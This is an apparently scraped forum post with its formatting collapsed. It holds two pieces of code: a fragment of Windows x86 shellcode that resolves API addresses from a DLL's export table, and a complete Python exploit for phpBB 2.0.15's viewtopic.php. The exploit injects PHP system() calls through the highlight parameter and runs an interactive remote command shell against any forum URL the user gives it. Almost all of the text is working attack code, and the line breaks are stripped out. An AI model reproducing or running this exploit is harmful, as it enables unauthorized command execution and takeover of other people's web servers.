hashjnz short find_startpop esi // ExportDirectorymov ebx, [esi+0x24] // AddressOfNameOrdinals RVAadd ebx, ebp // rva2vamov cx, [ebx+ecx*2] // FunctionOrdinalmov ebx, [esi+0x1C] // AddressOfFunctions RVAadd ebx, ebp // rva2vamov eax, [ebx+ecx*4] // FunctionAddress RVAadd eax, ebp // rva2vastosd // function address save to [edi]pop esipop ecxretsc_end:call sc_startPROC_END //C macro to end proc}}
-
phpBB 2.0.15 "viewtopic.php" Remote PHP Code Execution Exploit ENDTAG = '</g0>' def makecmd(cmd) linenums:0'>#!/usr/bin/pyth0nprint "\nphpBB 2.0.15 arbitrary command execution eXploit" print " 2005 by rattle@awarenetwork.org" print " well, just because there is none." import sys from urllib2 import Request, urlopenfrom urlparse import urlparse, urlunparsefrom urllib import quote as quote_plusINITTAG = '<g0>'ENDTAG = '</g0>'def makecmd(cmd):return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd[1:],'chr(%d)'%ord(cmd[0]))_ex = "%sviewtopic.php?t=%s&highlight=%%27."_ex += "printf(" + makecmd(INITTAG) + ").system(%s)."_ex += "printf(" + makecmd(ENDTAG) + ").%%27"def usage():print """Usage: %s <forum> <topic>forum - fully qualified url to the forumexample: % sys.argv[0]; sys.exit(1)if __name__ == '__main__':if len(sys.argv) < 3 or not sys.argv[2].isdigit():usage()else:printurl = sys.argv[1]if url.count("://") == 0: url = "http://" + urlurl = list(urlparse(url))host = url[1]if not host: usage()if not url[0]: url[0] = 'http'if not url[2]: url[2] = '/'url[3] = url[4] = url[5] = ''url = urlunparse(url)if url[-1] != '/': url += '/'topic = quote_plus((sys.argv[2]))while 1:try:cmd = raw_input("[%s]$ " % host).strip()if cmd[-1]==';': cmd=cmd[:-1]if (cmd == "exit"): breakelse: cmd = makecmd(cmd)out = _ex % (url,topic,cmd)try: ret = urlopen(Request(out)).read()except KeyboardInterrupt: continueexcept: passelse:ret = ret.split(INITTAG,1)if len(ret)>1: ret = ret[1].split(ENDTAG,1)if len(ret)>1:ret = ret[0].strip();if ret: print retcontinue;print "EXPLOIT FAILED"except:continue Notice from cmatcmextra: Codebox tags used instead of code tags